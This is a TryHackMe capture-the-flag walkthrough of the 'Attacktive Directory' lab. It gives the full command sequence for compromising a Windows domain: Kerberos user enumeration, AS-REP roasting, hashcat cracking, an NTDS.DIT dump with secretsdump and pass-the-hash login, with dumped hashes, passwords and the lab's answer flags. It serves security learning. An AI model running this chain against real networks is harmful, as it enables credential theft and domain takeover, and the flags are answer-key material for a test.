Attacktive Directory
- 🌐 Website: TryHackMe
- 🔥 Level: Medium
- 🖥️ OS: N/D
- 🔗 Link: Attacktive Directory
First of all, let's run nmap so we always have it available:
──(kali㉿kali)-[~/Desktop/THM]
└─$ nmap -sV -sC 10.113.167.216 | tee nmap.txt
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-14 14:41 +0100
Nmap scan report for 10.113.167.216
Host is up (0.036s latency).
Not shown: 986 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-14 13:42:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2026-03-13T13:39:13
|_Not valid after: 2026-09-12T13:39:13
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2026-03-14T13:42:06+00:00
|_ssl-date: 2026-03-14T13:42:14+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-03-14T13:42:09
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.46 seconds
Welcome to Attacktive Directory¶
❓Question¶
What tool will allow us to enumerate port 139/445?
📋 Walkthrough¶
One of the most used enumeration tools for Active Directory is enum4linux
Answer
enum4linux
❓Question¶
What is the NetBIOS-Domain Name of the machine?
📋 Walkthrough¶
Read it in the nmap output
Answer
THM-AD
❓Question¶
What invalid TLD do people commonly use for their Active Directory Domain?
📋 Walkthrough¶
Read it in the nmap output
Answer
.local
Enumerating Users via Kerberos¶
❓Question¶
What command within Kerbrute will allow us to enumerate valid usernames?
📋 Walkthrough¶
In this section there are two files to download: userlist.txt and passwordlist.txt
To install kerbrute on Kali
Now we can check the command used for enumeration:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ kerbrute -h
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 03/14/26 - Ronnie Flathers @ropnop
This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts
Usage:
kerbrute [command]
Available Commands:
bruteforce Bruteforce username:password combos, from a file or stdin
bruteuser Bruteforce a single user's password from a wordlist
help Help about any command
passwordspray Test a single password against a list of users
userenum Enumerate valid domain usernames via Kerberos
version Display version info and quit
Flags:
--dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
--delay int Delay in millisecond between each attempt. Will always use single thread if set
-d, --domain string The full domain to use (e.g. contoso.com)
-h, --help help for kerbrute
-o, --output string File to write logs to. Optional.
--safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE
-t, --threads int Threads to use (default 10)
-v, --verbose Log failures and errors
Use "kerbrute [command] --help" for more information about a command.
Answer
userenum
❓Question¶
What notable account is discovered? (These should jump out at you)
📋 Walkthrough¶
Let's run kerbrute userenum and discover valid users
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ kerbrute userenum --dc 10.113.167.216 -d "spookysec.local" userlist.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 03/14/26 - Ronnie Flathers @ropnop
2026/03/14 14:59:35 > Using KDC(s):
2026/03/14 14:59:35 > 10.113.167.216:88
2026/03/14 14:59:35 > [+] VALID USERNAME: james@spookysec.local
2026/03/14 14:59:36 > [+] VALID USERNAME: svc-admin@spookysec.local
2026/03/14 14:59:36 > [+] VALID USERNAME: James@spookysec.local
2026/03/14 14:59:37 > [+] VALID USERNAME: robin@spookysec.local
2026/03/14 14:59:40 > [+] VALID USERNAME: darkstar@spookysec.local
2026/03/14 14:59:42 > [+] VALID USERNAME: administrator@spookysec.local
2026/03/14 14:59:46 > [+] VALID USERNAME: backup@spookysec.local
2026/03/14 14:59:47 > [+] VALID USERNAME: paradox@spookysec.local
2026/03/14 15:00:00 > [+] VALID USERNAME: JAMES@spookysec.local
2026/03/14 15:00:04 > [+] VALID USERNAME: Robin@spookysec.local
2026/03/14 15:00:27 > [+] VALID USERNAME: Administrator@spookysec.local
2026/03/14 15:01:21 > [+] VALID USERNAME: Darkstar@spookysec.local
2026/03/14 15:01:38 > [+] VALID USERNAME: Paradox@spookysec.local
2026/03/14 15:02:28 > [+] VALID USERNAME: DARKSTAR@spookysec.local
2026/03/14 15:02:47 > [+] VALID USERNAME: ori@spookysec.local
Let's save the list of discovered users in users.txt
Answer
svc-admin
❓Question¶
What is the other notable account is discovered? (These should jump out at you)
Answer
backup
Abusing Kerberos¶
❓Question¶
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
📋 Walkthrough¶
Let's use GetNPUsers.py from the impacket library to enumerate users with the Does not require Pre-Authentication privilege (which allows us to request Kerberos tickets without logging in)
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ impacket-GetNPUsers -no-pass -usersfile users.txt -dc-ip 10.113.167.216 spookysec.local/
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] User james@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.LOCAL:2f798d84f36076ba870f070761cacf80$f562a4c152f1100761bddbe47e6b224bd8fc979629f989bf3a216a4f71355187b8187c20111df37a4ad5c1e802de096e8a3ce8c53e4d0f6a9d7b56f28aa26f1571a80a65bce5f2623b9e66f65f668fb2b5dcce09cb2f89390eb870c8a558c8819cb67d9b63a90ff67666e9a21b584504fedd7b56be1c9599bf03b016f360d30d5f4ffaed88ff855f2ba56978d93a271dbfcf148f7e3397c7f1659057f002e1f0320d170efdcd41334b619e53dbf9c1a7841c39074b3d67d6f85a861cbe2b131ad5e00032a3ddccdfadd624fac00cc213bcd36c89e9c7c5f3750d73bb8cb2cb564ae318abe1804789aa508e45be28ab04d66b
[-] User James@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robin@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkstar@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User JAMES@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Robin@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Darkstar@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Paradox@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DARKSTAR@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ori@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
svc-admin user Answer
svc-admin
❓Question¶
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
Answer
Kerberos 5, etype 23, AS-REP
❓Question¶
What mode is the hash?
Answer
18200
❓Question¶
Now crack the hash with the modified password list provided, what is the user accounts password?
📋 Walkthrough¶
Let's run hashcat in mode 18200 with the provided passwordlist.txt file
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ hashcat -m 18200 hash passwordlist.txt
hashcat (v7.1.2) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-haswell-13th Gen Intel(R) Core(TM) i7-13700KF, 14907/29814 MB (4096 MB allocatable), 24MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory allocated for this attack: 518 MB (24940 MB free)
Dictionary cache built:
* Filename..: passwordlist.txt
* Passwords.: 70189
* Bytes.....: 569237
* Keyspace..: 70189
* Runtime...: 0 secs
$krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.LOCAL:2f798d84f36076ba870f070761cacf80$f562a4c152f1100761bddbe47e6b224bd8fc979629f989bf3a216a4f71355187b8187c20111df37a4ad5c1e802de096e8a3ce8c53e4d0f6a9d7b56f28aa26f1571a80a65bce5f2623b9e66f65f668fb2b5dcce09cb2f89390eb870c8a558c8819cb67d9b63a90ff67666e9a21b584504fedd7b56be1c9599bf03b016f360d30d5f4ffaed88ff855f2ba56978d93a271dbfcf148f7e3397c7f1659057f002e1f0320d170efdcd41334b619e53dbf9c1a7841c39074b3d67d6f85a861cbe2b131ad5e00032a3ddccdfadd624fac00cc213bcd36c89e9c7c5f3750d73bb8cb2cb564ae318abe1804789aa508e45be28ab04d66b:[REDACTED]
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.L...04d66b
Time.Started.....: Sat Mar 14 15:18:24 2026 (0 secs)
Time.Estimated...: Sat Mar 14 15:18:24 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (passwordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 840.3 kH/s (1.35ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 24576/70189 (35.01%)
Rejected.........: 0/24576 (0.00%)
Restore.Point....: 0/70189 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: m123456 -> 280890
Hardware.Mon.#01.: Temp: 49c Util: 6%
Started: Sat Mar 14 15:18:11 2026
Stopped: Sat Mar 14 15:18:25 2026
We got the password: svc-admin:[REDACTED]
Answer
management2005
Back to the Basics¶
❓Question¶
What utility can we use to map remote SMB shares?
Answer
smbclient
❓Question¶
Which option will list shares?
Answer
-L
❓Question¶
How many remote shares is the server listing?
📋 Walkthrough¶
Let's check the available shares using smbclient
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ smbclient -L \\10.113.167.216 -U "svc-admin" -p
Password for [WORKGROUP\svc-admin]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.113.167.216 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Answer
6
❓Question¶
There is one particular share that we have access to that contains a text file. Which share is it?
Answer
backup
❓Question¶
``
📋 Walkthrough¶
To use a different tool, I decided to use impacket-smbclient
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ impacket-smbclient spookysec.local/svc-admin:management2005@10.113.167.216
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# list
*** Unknown syntax: list
# ls
[-] No share selected
# help
open {host,port=445} - opens a SMB connection against the target host/port
reconnect - reconnect connection, useful for broken pipes & interrupted sessions
login {domain/username,passwd} - logs into the current SMB connection, no parameters for NULL connection. If no password specified, it'll be prompted
kerberos_login {domain/username,passwd} - logs into the current SMB connection using Kerberos. If no password specified, it'll be prompted. Use the DNS resolvable domain name
login_hash {domain/username,lmhash:nthash} - logs into the current SMB connection using the password hashes
logoff - logs off
shares - list available shares
use {sharename} - connect to an specific share
cd {path} - changes the current directory to {path}
lcd {path} - changes the current local directory to {path}
pwd - shows current remote directory
password - changes the user password, the new password will be prompted for input
ls {wildcard} - lists all the files in the current directory
lls {dirname} - lists all the files on the local filesystem.
tree {filepath} - recursively lists all files in folder and sub folders
rm {file} - removes the selected file
mkdir {dirname} - creates the directory under the current path
rmdir {dirname} - removes the directory under the current path
put {filename} - uploads the filename into the current path
get {filename} - downloads the filename from the current path
mget {mask} - downloads all files from the current directory matching the provided mask
cat {filename} - reads the filename from the current path
mount {target,path} - creates a mount point from {path} to {target} (admin required)
umount {path} - removes the mount point at {path} without deleting the directory (admin required)
list_snapshots {path} - lists the vss snapshots for the specified path
info - returns NetrServerInfo main results
who - returns the sessions currently connected at the target host (admin required)
close - closes the current SMB Session
exit - terminates the server process (and this session)
# shares
ADMIN$
backup
C$
IPC$
NETLOGON
SYSVOL
# use backup
# ls
drw-rw-rw- 0 Sat Apr 4 21:08:39 2020 .
drw-rw-rw- 0 Sat Apr 4 21:08:39 2020 ..
-rw-rw-rw- 48 Sat Apr 4 21:08:53 2020 backup_credentials.txt
# get backup_credentials.txt
Answer
backup
❓Question¶
What is the content of the file?
Answer
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
❓Question¶
Decoding the contents of the file, what is the full contents?
📋 Walkthrough¶
Let's decode it from base64
Answer
backup@spookysec.local:backup2517860
Elevating Privileges within the Domain¶
❓Question¶
What method allowed us to dump NTDS.DIT?
📋 Walkthrough¶
Let's check the help of impacket-secretsdump
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ impacket-secretsdump
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
usage: secretsdump.py [-h] [-ts] [-debug] [-system SYSTEM] [-bootkey BOOTKEY] [-security SECURITY] [-sam SAM] [-ntds NTDS]
[-resumefile RESUMEFILE] [-skip-sam] [-skip-security] [-outputfile OUTPUTFILE] [-use-vss]
[-rodcNo RODCNO] [-rodcKey RODCKEY] [-use-keylist] [-exec-method [{smbexec,wmiexec,mmcexec}]]
[-use-remoteSSWMI] [-use-remoteSSWMI-NTDS] [-remoteSSWMI-remote-volume REMOTESSWMI_REMOTE_VOLUME]
[-remoteSSWMI-local-path REMOTESSWMI_LOCAL_PATH] [-just-dc-user USERNAME] [-ldapfilter LDAPFILTER]
[-just-dc] [-just-dc-ntlm] [-skip-user SKIP_USER] [-pwd-last-set] [-user-status] [-history]
[-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address]
[-target-ip ip address]
target
Performs various techniques to dump secrets from the remote machine without executing any agent there.
positional arguments:
target [[domain/]username[:password]@]<targetName or address> or LOCAL (if you want to parse local files)
options:
-h, --help show this help message and exit
-ts Adds timestamp to every logging output
-debug Turn DEBUG output ON
-system SYSTEM SYSTEM hive to parse (only binary REGF, as .reg text file lacks the metadata to compute the
bootkey)
-bootkey BOOTKEY bootkey for SYSTEM hive
-security SECURITY SECURITY hive to parse
-sam SAM SAM hive to parse
-ntds NTDS NTDS.DIT file to parse
-resumefile RESUMEFILE
resume file name to resume NTDS.DIT session dump (only available to DRSUAPI approach). This file
will also be used to keep updating the session's state
-skip-sam Do NOT parse the SAM hive on remote system
-skip-security Do NOT parse the SECURITY hive on remote system
-outputfile OUTPUTFILE
base output filename. Extensions will be added for sam, secrets, cached and ntds
-use-vss Use the NTDSUTIL VSS method instead of default DRSUAPI
-rodcNo RODCNO Number of the RODC krbtgt account (only avaiable for Kerb-Key-List approach)
-rodcKey RODCKEY AES key of the Read Only Domain Controller (only avaiable for Kerb-Key-List approach)
-use-keylist Use the Kerb-Key-List method instead of default DRSUAPI
-exec-method [{smbexec,wmiexec,mmcexec}]
Remote exec method to use at target (only when using -use-vss). Default: smbexec
-use-remoteSSWMI Remotely create Shadow Snapshot via WMI and download SAM, SYSTEM and SECURITY from it, the parse
locally
-use-remoteSSWMI-NTDS
Dump NTDS.DIT also when using the Remote Shadow Snapshot Method via WMI. Use it with dumping from a
DC. IMPORTANT: this flag only works when also using -use-remoteSSWMI
-remoteSSWMI-remote-volume REMOTESSWMI_REMOTE_VOLUME
Remote Volume to perform the Shadow Snapshot and download SAM, SYSTEM and SECURITY. It defaults to
C:\
-remoteSSWMI-local-path REMOTESSWMI_LOCAL_PATH
Path where download SAM, SYSTEM and SECURITY from Shadow Snapshot. It defaults to current path
display options:
-just-dc-user USERNAME
Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies
also -just-dc switch
-ldapfilter LDAPFILTER
Extract only NTDS.DIT data for specific users based on an LDAP filter. Only available for DRSUAPI
approach. Implies also -just-dc switch
-just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)
-just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only)
-skip-user SKIP_USER Do NOT extract NTDS.DIT data for the user specified. Can provide comma-separated list of users to
skip, or text file with one user per line
-pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile data
-user-status Display whether or not the user is disabled
-history Dump password history, and LSA secrets OldVal
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target
parameters. If valid credentials cannot be found, it will use the ones specified in the command
line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-keytab KEYTAB Read keys for SPN from keytab file
connection:
-dc-ip ip address IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the
target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is
useful when target is the NetBIOS name and you cannot resolve it
Let's use -just-dc to dump all users we can
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ impacket-secretsdump -just-dc spooky.sec/backup:backup2517860@10.113.167.216
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:c5a191aea415aa6dbe3f9df7e682eb6c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:33914ddc95cd7c35af38ca472bfc482cddcd5b33bac475e28e7a80da2ef446d6
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:58d9b0e2915fbed798a5c04913234377
ATTACKTIVEDIREC$:des-cbc-md5:795297bad957d6f4
[*] Cleaning up...
Answer
DRSUAPI
❓Question¶
What is the Administrators NTLM hash?
📋 Walkthrough¶
The NTLM hash is the second part of the hash
Answer
0e0363213e37b94221497260b0bcb4fc
❓Question¶
What method of attack could allow us to authenticate as the user without the password?
Answer
Pass The Hash
❓Question¶
``
📋 Walkthrough¶
Let's check the help of evil-winrm
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ evil-winrm
Evil-WinRM shell v3.9
Error: missing argument: ip, user
Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-a USERAGENT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [-K TICKET_FILE] [--spn SPN_PREFIX] [-l]
-S, --ssl Enable ssl
-c, --pub-key PUBLIC_KEY_PATH Local path to public key certificate
-k, --priv-key PRIVATE_KEY_PATH Local path to private key certificate
-r, --realm DOMAIN Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }
-s, --scripts PS_SCRIPTS_PATH Powershell scripts local path
--spn SPN_PREFIX SPN prefix for Kerberos auth (default HTTP)
-K, --ccache TICKET_FILE Path to Kerberos ticket file (ccache or kirbi format, auto-detected)
-e, --executables EXES_PATH C# executables local path
-i, --ip IP Remote host IP or hostname. FQDN for Kerberos auth (required)
-U, --url URL Remote url endpoint (default /wsman)
-u, --user USER Username (required if not using kerberos)
-p, --password PASS Password
-H, --hash HASH NTHash
-P, --port PORT Remote host port (default 5985)
-a, --user-agent USERAGENT Specify connection user-agent (default Microsoft WinRM Client)
-V, --version Show version
-n, --no-colors Disable colors
-N, --no-rpath-completion Disable remote path completion
-l, --log Log the WinRM session
-h, --help Display this help message
Answer
-H
Flag Submission Panel¶
Submit the flags for each user account. They can be located on each user's desktop.
Let's connect with the administrator account using Pass the Hash
──(kali㉿kali)-[~/Desktop/THM]
└─$ evil-winrm -u administrator -H 0e0363213e37b94221497260b0bcb4fc -i 10.113.167.216
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../
*Evil-WinRM* PS C:\Users\Administrator> ls
❓Question¶
svc-admin
Answer
TryHackMe{K3rb3r0s_Pr3_4uth}
❓Question¶
backup
Answer
TryHackMe{B4ckM3UpSc0tty!}
